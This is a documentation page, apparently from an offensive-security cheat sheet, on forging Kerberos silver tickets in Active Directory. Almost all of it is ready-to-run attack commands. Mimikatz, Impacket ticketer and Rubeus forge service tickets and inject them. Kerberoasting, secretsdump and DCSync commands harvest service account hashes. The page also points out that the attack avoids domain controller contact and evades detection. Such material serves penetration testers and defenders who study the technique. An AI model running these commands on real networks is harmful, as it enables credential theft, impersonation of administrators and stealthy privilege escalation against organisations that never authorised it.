Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

Forge TGS for specific service using service account NTLM hash. Unlike Golden Ticket — no DC contact needed, harder to detect. Limited to single service.

Requirements

  • Service account NTLM hash
  • Domain SID
  • Target SPN

Common SPNs

ServiceSPN Format
CIFS (SMB)cifs/target.domain.local
HTTPhttp/target.domain.local
MSSQLMSSQLSvc/target.domain.local:1433
HOSThost/target.domain.local
LDAPldap/dc.domain.local
WSMANwsman/target.domain.local

Forge — Mimikatz

mimikatz # kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-DOMAIN-SID /target:target.domain.local /service:cifs /rc4:SERVICE_NTLM_HASH /ptt

MSSQL

mimikatz # kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-DOMAIN-SID /target:sql.domain.local /service:MSSQLSvc /rc4:SVC_HASH /ptt

Forge — Impacket

impacket-ticketer -nthash SERVICE_HASH -domain-sid S-1-5-21-DOMAIN-SID -domain domain.local -spn cifs/target.domain.local Administrator

Use

export KRB5CCNAME=Administrator.ccache
impacket-smbclient domain.local/[email protected] -k -no-pass

Forge — Rubeus

.\Rubeus.exe silver /service:cifs/target.domain.local /rc4:SERVICE_HASH /user:Administrator /domain:domain.local /sid:S-1-5-21-DOMAIN-SID /ptt

Get Service Account Hash

# Kerberoasting
impacket-GetUserSPNs DOMAIN/user:pass -dc-ip DC -request

# From compromised host (local admin)
impacket-secretsdump user:pass@TARGET

# DCSync (if DA)
impacket-secretsdump DOMAIN/admin:pass@DC -just-dc-user svc_account

Notes

  • No DC contact → harder to detect
  • Forged for single service only
  • Machine account hash works for CIFS/HOST
  • Can set any user, any groups in PAC

Quick Reference

TaskCommand
Forge CIFSkerberos::golden /service:cifs /rc4:HASH /ptt
Impacketimpacket-ticketer -nthash HASH -spn cifs/target Admin
Useexport KRB5CCNAME=Admin.ccache-k -no-pass